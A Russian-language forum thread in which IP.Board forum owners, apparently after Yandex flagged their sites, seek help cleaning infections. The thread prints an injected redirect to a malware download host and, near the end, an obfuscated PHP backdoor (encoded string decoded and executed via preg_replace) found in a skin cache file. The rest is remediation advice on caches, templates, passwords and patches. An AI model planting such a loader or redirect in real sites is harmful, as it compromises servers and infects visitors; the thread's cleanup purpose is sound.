Вопрос такой: на днях Яндекс сообщил мне, что мой сайт заражен вредоносным кодом.

 

Я полез в Яндекс.Вебмастер, который мне сообщал, что вердикт мне вынесен "Поведенческий анализ"

А именно:

 

Поведенческий анализ

 

Антивирусный робот Яндекса при проверке страниц анализирует поведение JavaScript-кода и других активных элементов. Если поведение совпадает с эвристическими правилами, характерными для drive-by-download атак, например, детектор вредоносных Java апплетов или детектор вредоносных PDF документов обнаруживают попытку эксплуатации уязвимости для выполнения вредоносного кода, то принимается решение о том, что проверяемая страница является опасной для посетителей.

 

Я, если честно, так и не понял что с этим делать и что и где искать. По всем остальным вердиктам хоть что-то понятно.

 

Написал вопрос в саппорт, ответ был следующим:

 

На Вашем сайте с помощью url: sport-horse.pro/index.php?ipbv=e13484a4543e54a53b72269a15c16faa&g=js периодически подгружается следующее вредоносное содержимое:

document.location='http://filestore321.com/download.php?id=6de46215' 

 

Действительно такая похожая ссылка на страницах форума встречается, но аналогичные ссылки есть в кодах страниц на других форумах.

В общем я в тупике и не понимаю в какую сторону мне рыть.

 

Делаю полный бекап форума на локалку и мыслю проверить какими-то антивирусами.

Попробовал прогнать сайт по известным мне онлайн-проверяльщикам - никто ничего не нашел.

 

Может кто-то направить добрым советом в нужную сторону? Был бы крайне признателен за помощь.

Во втором сообщение написано какая уязвимость эксплуатируется. Сам вектор атаки мне тоже пока не удалось выяснить, хотя, если посмотреть на эксплоит, думая и так понятно каким приблизительно он будет.

@siv1987, хочу проконсультироваться у Вас.

Во-первых, большое спасибо за scan.php. За все время своего форума, был всего-лишь один взлом, помните, может быть в 12-13 году до появления какого-то патча, взломали тысячи форумов и поднаклали в conf_global, потом в какой-то из аватарок под видом картинки внедрили код, и так у всех, кто был не пропатчен. Потом Вы мне сами удалили всю вирусню и пропатчили форум. Спасибо.

Сегодня решил Вашим scan-ом проанализировать состояние своего форума (добавлю, что после того, как Вы мне все настроили, меня больше не взламывали - я так думаю), и что Вы думаете? Вот, приведу несколько фрагментов, а Вы скажите, что бы это могло значить и является ли сие вирусняком... Яндекс по крайней мере на это не ругается...

 

1.

./dumper.php
-------------------------
base64_decode($_COOKIE['sxd']));

 

2.

./ips_kernel/classCaptchaPlugin/default.php
-------------------------
base64_decode( "R0lGODlhyAA8AJEAAN/f3z8/P8zMzP///yH5BAAAAAAALAAAAADIADwAAAL/nI+py+0Po5y02ouz3rz7D4biSJbmiabqyrbuC8fyTNf2jef6zvf+DwwKh8Si8YhMlgACwEHQXESfzgOzykQAqgMmFMr9Rq+GbHlqAFsFWnFVrfwIAvQAu15P0A14Nn8/ADhXd4dnl2YYCAioGHBgyDbnNzBIV0gYxzEYWdg1iLAnScmFuQdAt2UKZTcl+mip+HoYG+tKOfv3N5l5garnmPt6CwyaFzrranu7i0crObvoaKvMyMhrIQhFuyzcyGwXcOpoLYg7DGsZXk5r6DSN51RNfF0RPU5sy7gpnH5bjLhrk7Y9/RQNisfq2CRJauTR6xUuFyBx/yrWypMMmTlq/9IwQnKWcKG5cvMeShBIMOFIaV9w2eti6SBABAyjvBRFMaZCMaxsqtxl8iShjpj+VfqGCJg4XzOfJCK5DVWliFNXlSIENKjWrVy7ev0KNqzYsWTFwhlFU8waLk+efGF7hi0aSgu3iGmV1cxdoGTinimbiGOeP8SWhps6z3AkeMMWW20mMykqQyuJDbYWdufKBJWc2uWmAJZdO0yOKfTCCqHGiO4E/oKGriTYaBw5g/MDqynNlW9Uhmx66tM2i05dNcM8O6Rg2MHLYKraLTpDcLebTke4APkcduAoku0DWpe24MI96ewZPdiy6Rlx/0Y+XJevlNu/z6vtlHFxZbpv9f9edYkfxgVmjnqSxXYOYPfFVMgXIHGC0ltWDNXYJ6Lsw82AFVpWEk4pEabgbsfBM5FphyDWRh1OLCUgbC06NtNU6UV1T1Jl3YhjjjruyGOPPv4IZJBC6tDXGUDB4UUaK06RhRl/0aWWF3CR4YWESraR1ZCh6dMOiMNIFE2GI/bRJYiIEeULiloyUNSFLzWC3VXcqEJXTBe1qApDpbXUEYxr2tYeQCyyGMuIcxbokHfPvPjHf25mqeWHoLEX0iH0UScmUzSWNxmj20yH6Z+/yNTeM0N1cumkg9E4GHnluLcfeKLm95yLoO5ZKJrhgeaQm4xlFGshcK3pYZ9LradQrmY5nmhVdMm+qqpKYkIqpDyltWkpjJJaaKmd6kXjHUXvDPborOaei2666q7LbrvuvgtvvPLOS2+9YBUAADs=" );

 

3.

./admin/sources/base/core.php
-------------------------
eval()'d code" ) )

Во-первых, большое спасибо за scan.php

Благодарить на самом деле особо не за что. Это всего лишь небольшой огрызок для быстрого поиска кода чаще всего используемого в шеллах. Есть куда более мощные сканеры по реальным сигнатурам вирусов. Когда Атаман сказал, что прождал несколько часов чтобы найти примитивный шелл вспомнил про этот скрипт. В реале же лучше использовать полноценные сканеры, как бы медленно они не работали.

 

Здесь вирусов нет. В первом случае это дампер (sxd), остальное рабочий код форума.

Проверил все 3 случая по дистрибутиву, оказалось, это обычный код, какой и должен быть... надо же, а скан на них ругается...

Он не ищет шеллы/бэкдоры как таковы, он ищет потенциально опасные функции, потому что шелл можно замаскировать таким образом, что его никак не отличишь от вроде нормального кода. В полноценных сканеров дополнительно есть и сигнатуры, только по ним можно сказать вирус это или нет, так как зачастую они имеют уникальный и массовый характер. "Индивидуальные" довольно сложно распознать.

Вас еще не взломали, но насколько я помню используете потенциально опасную версию. Следует обновится хотябы до той, для которой выпущены все последние патчи безопасности.

@siv1987, версия-то старенькая, но я постарался всячески отгородиться от разных видов взлома. Может я напрасно столь самонадеян? Обновившись до актуальной версии, - это опять голый движок со своими тараканами + опять над ним надо работать, искать модули и приложения (которые есть сейчас) + сколько я сделал правок в файлах на сервере (100500). Если в них вносить правки для новой версии, то это опять придется искать новые решения и огромная работа над новым движком. А когда ее закончу, версия форума опять будет уязвимой. Я так понимаю, обновлениям конца и края нет, ибо всегда найдется способ взломать любой ресурс, хоть пентагона, хоть сбербанка. Не верю в утопию, что когда-то будет создан идеальный двиг без дырок и который невозможно взломать.

 

P.S. Да и форум мой занимает ничтожную долю информационного рынка - он никому не нужен для взлома. Это ж обычный провинциальный форум столицы одного из регионов страны.

Помогите разобраться.

Который раз яндекс блокирует сайт, первый раз я наёшл вирус, об этом писал неделю назад, а сейчас прошелся айболитом (результата не дало "Может, я что-то не увидел), могу прислать результат в ЛС).

Полностью удалял содержимое кроме uploads - и некоторых вложенных папок, менял пароли и тд. результат не дало.

То был бэкдор, он не предназначен для посетителей а для выполнения пользовательского кода на сервере.

В кеше вируса нету? Пароли все были заменены? Нужно смотреть на что ругается яндекс и искать ифреймы и вредоносные скрипты.

Все кеши очистил. Пароли менял. Фтп отключен, яндекс ругается на распространения вредоносного по

Но я этого вируса в глаза не вижу, вот в чем странность. В Бд аналогично. Возможно у кого-то через профиль ломится, сейчас залочу всем администраторам вход в АЦ и кэши очищу.

 

Здравствуйте

 

На Вашем сайте периодически появляется указанный ниже вредоносный код:

 

document.location='filestore321.com/download.php?id=b8b4226f'

 

при подгрузке следующего url:

 

сайт/forum/index.php?ipbv=3f8dbe2138fd1c631467545040cce6d1&g=js

 

Пожалуйста, проверьте Ваши файлы и удалите вредоносный код. При поиске источника заражения воспользуйтесь рекомендациями, описанными на странице нашей Помощи http://help.yandex.r...ter/?id=1116613 .

 

Также об этой проблеме Вы можете прочитать в следующих статьях:

 

http://searchengines...ad.php?t=828634

http://ipbskins.ru/f...html#entry89857

 

Если при следующей проверке сайта опасное содержимое не будет обнаружено, пометка в выдаче снимется.

 

Менять пароли нужно при КАЖДОМ обнаружении вируса для всех пользователей и базе данных. На предыдущих страницах я приводил код который выполняют при заражении форума, где видно, что извлекаются данные всех админов с форума. После обновления кеша в АЦ желательно все же проверить файл и место где сидит вирус - может не хватает прав на запись, может вирус находится не только в кэше но и в шаблоне, тогда его нужно выпилить из шаблона в админцетре тоже. И менять пароли после каждого лечения.

Я понимаю. Первый раз хватило на неделю, но то был другой обычный вирус, тут этот приполз неожиданно.

Сейчас буду проверять шаблон админцентр. "Спс за подсказку".

в файле /cache/skin_cache/cacheid_1/skin_global.php был найден и удален следующий код:

$pk='b5c742b518ce6244a2407ff3dd9c3fcc';
$rsa='!:`>rhU`K!%T.S!k^S!rnp*Fn">7`]F/JOex<">&5pJtU&g~`dF7O"]T`Og~kQ#*`b*s!QMs5[s*`Og+Up;aO"]Qk&FQkQkKC[*Inp*^n"}:JtF>kxn:kxCxP6|s<qtsJfmskqg>S[#*OtW-{tMUnAWNOb*sJOJmU[mf4Og>gZM0Jp]ZU"M>5Ag~k>FQUqe}CQ#*OtW-{tMUnAWNOb*s5HK*SHt|kAn>JtFz4OMZ`[#xB"n:SA}/kp>*JOni4qnmS"}ik"}tkxWi!d;7Jp]TB"*xP[M0{~]b]*]bdQSB];MeOt]HM]n0e{S;H>exOb*Inp4FeAWmkxg>Oq]QU[#*Otg;{>J;{>Kxb;M{{;FbM{J;{*]bnt~s<QMZ-{|*J>Kx`pF/S[sS<QMQ-{W+k&]xO"tmSpg^5[kZUp>"J]+74"Fz0pS:U"SKJ]+70A>m`pF:O[ai4&>7JQaZU"ti!d;7Jp]TO[aQSO}Q4dtfUp]QO[aQSO}f4d>*S]+70pJm4"]fU"FNO[ai`da/Sp;xk&;zO[aiSp>7!O]QU;+70pnsS;+7UA*Z`bkKnpCs0A+*4/~Fnqe74"ix<QM^-bM0{~]b]*]bdQSB];MeO~m-{texOHK*4Z~*SpmskQ~GkmNrTq1Gk"]~Sp>7JqgUn"g:U"zsJ]FsJ[sS<QMx-bMfPfS/JOg/`dF7O">*n/K*JH~*4fTxUp;7JtFsJ[kInpeFJdt+SA*^n;FHM]ndM]nUn~m{];W0d;FgHt^xOb*I`d4^Jdt+SA*^n;F6H~FPb{]Unp]S5b>I`d4^`Og/JOe^n;FAM]MUn">+4x4xOb*&nf#mJdt+SA*^n;FAM]MUn"kxOb*snf4^Bd]zkAMa5[M0e~F-b~>;dQMxOb*s5OzsJf#*4/~Fnp#s!">&5[M*5Og>Spg:U"zsJb#*Jb+xJdTxPAMsUd{^5bK/gZ|+C[*Inp~Fkq]fkqMQ5pt*gb#*`[*KC[+T5Hz+k&>7S[#fJpFZSdt>Uxe7UpFZ4OMsU"TFn"m~SA|%PQFtk&+~k"m:kxe7`da&UQFInptFnQBs<qt>!p>~<qtsJf#^BbMt5b4&nABs!QMn{jnB]jtCPZ~f-AgZk&>+S[W~!OW>-bS~JOm~P"smS&;/4qnskAexBAgQ4/~x!QM~`p>/PHa/JOM~`daxktKx4&Fmk&M0SOnKnttFP">7Jp]TPxW^k6Fskpn"-OK*SpmskQ~GkmNrTq1Gk&]x`Og~kx*z-&FtSAWtS[~GkmNrTq1G4da~`{gm4"m>bp;/`A~&4dt+<"kF`xCx-Z+:k"gQ`OW~-fBI0O~11l';
$pka='!+Fa[3S%s}<QL*DKI-xA?tuV$]2rzJ~^B.glo)b{1W:REej@dN6vn|XicM"=m`hGpU_Cf8kY5;/#q,OPT47wyZ9H>0(&';
$pkb='ew95C#d6pxOy&k<s7PnH:1$`"Vq(tZ0oI_N;?}SU)Bv=]QE+WrD/JA,8!R2~ha@.Gb[Mi-c^KFzg3|XL4Yu{>j*Tlf%m';
$f='%t%'.substr($rsa,718,1);
$klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html');

 

Код удалил.

 

Прочитал внимательно посты от siv1987 по лечению сайта, где основная суть лечения заключается в:

1. Проверка шаблона includeJS (Глобальные) в АЦ. Обновления кеша стилей для удаления вредасного кода из кеша.

Кода в файле вредоносного не было найдено:

 

2. Обновления форума до актуальной версии со всеми патчами безопасности (или хотябы установка ихних)

Патчи все установил последние

 

3. Смена паролей для:- всех (!) пользователей имеющих доступ в АЦ: - базе данных, - фтп

Сменил

 

4. Добавления форума в Яндекс.Вебмастер'е с отправкой запроса на перепроверку в разделе Безопасность (это ускорит повторную проверку форума).

Ответ от Яндекса - Ваш сайт заражен

 

 

Захожу в файл /cache/skin_cache/cacheid_1/skin_global.php и снова нахожу вирусный код, который удалил вчера:

Что делать дальше? Где искать?

Код удаляется обновлением кешей стилей - Внешний Вид -> Инструменты -> Обновление кеш-файлов. Попутно нужно проверить шаблон includeJS в админцентре. Потом обязательно сменить пароли всех администраторов и к базе данных. Эти процедуры нужно проделать каждый раз после обнаружения вируса. Ко всему этому можно обновить и кеши языков. И обязательно установить патчи безопасности или обновится до версии в которой эти уязвимости закрыты, иначе все действия будут напрасны.